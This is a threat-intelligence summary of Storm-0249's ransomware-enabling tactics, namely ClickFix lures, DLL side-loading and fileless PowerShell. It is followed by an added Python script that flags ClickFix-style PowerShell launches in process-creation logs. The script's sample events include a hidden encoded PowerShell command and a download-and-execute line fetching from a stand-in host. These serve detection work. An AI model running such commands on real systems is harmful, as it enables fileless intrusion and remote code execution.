Storm-0249 is shifting from initial access provisioning to more sophisticated tactics like domain spoofing, DLL side-loading, and fileless PowerShell execution to facilitate ransomware attacks. These methods enable stealthy infiltration, persistence, and exploitation of trust in signed processes, potentially aiding ransomware groups such as LockBit and ALPHV. #Storm0249 #SentinelOne #LockBit #ALPHV #C2
Key points
- Storm-0249 is evolving from an initial access broker to deploying advanced attack techniques.
- The threat actor uses social engineering tactics like ClickFix to trick targets into executing malicious commands.
- Attacks leverage legitimate Windows utilities and signed processes to stay undetected.
- Malicious activities include deploying fileless PowerShell scripts and trojanized DLLs for persistence.
- The goal of these tactics is to prepare for ransomware attacks by tying encryption to system identifiers like MachineGuid.
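The ClickFix lure and the fileless PowerShell stage described above both end in the same observable: a user-facing parent process (typically explorer.exe, via the Run dialog) spawning powershell.exe with a hidden window, an encoded or download-and-execute command line, and execution-policy bypass switches. The script below is an added detection example for this summary; it is not code from the linked article or from SentinelOne's research. The simplified `key=value` log format, the sample records and the indicator regexes are assumptions constructed for the example, loosely modelled on Windows process-creation telemetry (Security 4688 / Sysmon Event ID 1), not published Storm-0249 indicators.

```python
"""Flag ClickFix-style fileless PowerShell launches in process-creation logs.

Added example, not from the article or SentinelOne. The log format and the
heuristics below are assumptions for illustration, not published IoCs.
"""
import re
from dataclasses import dataclass

# Constructed sample records (not real telemetry), one process-creation
# event per line: timestamp, parent image, child image, full command line.
SAMPLE_EVENTS = [
    'ts=2025-12-01T10:01:00Z parent=explorer.exe image=powershell.exe '
    'cmd="powershell -w hidden -nop -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"',
    'ts=2025-12-01T10:02:00Z parent=services.exe image=powershell.exe '
    'cmd="powershell -NonInteractive -File C:\\Scripts\\backup.ps1"',
    'ts=2025-12-01T10:03:00Z parent=explorer.exe image=powershell.exe '
    'cmd="powershell -nop -w hidden -c iex (New-Object Net.WebClient).DownloadString(\'http://example.invalid/x\')"',
    'ts=2025-12-01T10:04:00Z parent=cmd.exe image=powershell.exe '
    'cmd="powershell Get-Process"',
]

LINE_RE = re.compile(
    r'ts=(?P<ts>\S+) parent=(?P<parent>\S+) image=(?P<image>\S+) cmd="(?P<cmd>.*)"$'
)

# Command-line indicators (assumed heuristics). Each one alone is common in
# legitimate automation; the combination under an interactive parent is not.
CMD_INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "encoded_command": re.compile(
        r"-e(?:nc|ncodedcommand|c)?\b\s+[A-Za-z0-9+/=]{20,}", re.I
    ),
    "policy_bypass": re.compile(
        r"-(?:ep|executionpolicy)\s+bypass|-no(?:p|profile)\b", re.I
    ),
    # Both an evaluator (iex) and a fetch primitive in the same command line.
    "download_and_execute": re.compile(
        r"(?=.*\b(?:iex|invoke-expression)\b)"
        r"(?=.*(?:downloadstring|webclient|invoke-webrequest|\birm\b))",
        re.I | re.S,
    ),
}

# Parents that indicate a human typed or pasted the command (Run dialog),
# which is the delivery path ClickFix-style lures rely on. Assumption.
INTERACTIVE_PARENTS = {"explorer.exe"}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}


@dataclass
class Finding:
    ts: str
    parent: str
    indicators: list


def parse_event(line):
    """Return the event fields as a dict, or None if the line is malformed."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def indicators_for(event):
    """Names of the command-line indicators present in this event."""
    cmd = event["cmd"]
    return [name for name, rx in CMD_INDICATORS.items() if rx.search(cmd)]


def is_suspicious(event):
    """PowerShell under an interactive parent with at least two indicators."""
    if event["image"].lower() not in POWERSHELL_IMAGES:
        return False
    if event["parent"].lower() not in INTERACTIVE_PARENTS:
        return False
    return len(indicators_for(event)) >= 2


def scan(lines):
    """Run the detection over raw log lines and return the findings."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        if ev and is_suspicious(ev):
            findings.append(Finding(ev["ts"], ev["parent"], indicators_for(ev)))
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f.ts} parent={f.parent} indicators={','.join(f.indicators)}")
```

The threshold of two indicators under an interactive parent is deliberately conservative: scheduled or service-launched PowerShell with `-File` and `-NonInteractive` (the second sample) is left alone, while the hidden-window, encoded and download-and-execute variants pasted through the Run dialog are flagged. Tune `INTERACTIVE_PARENTS` and the threshold to your environment, and feed it real 4688 or Sysmon records by replacing `LINE_RE` with a parser for your log source.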
Read More: https://thehackernews.com/2025/12/storm-0249-escalates-ransomware-attacks.html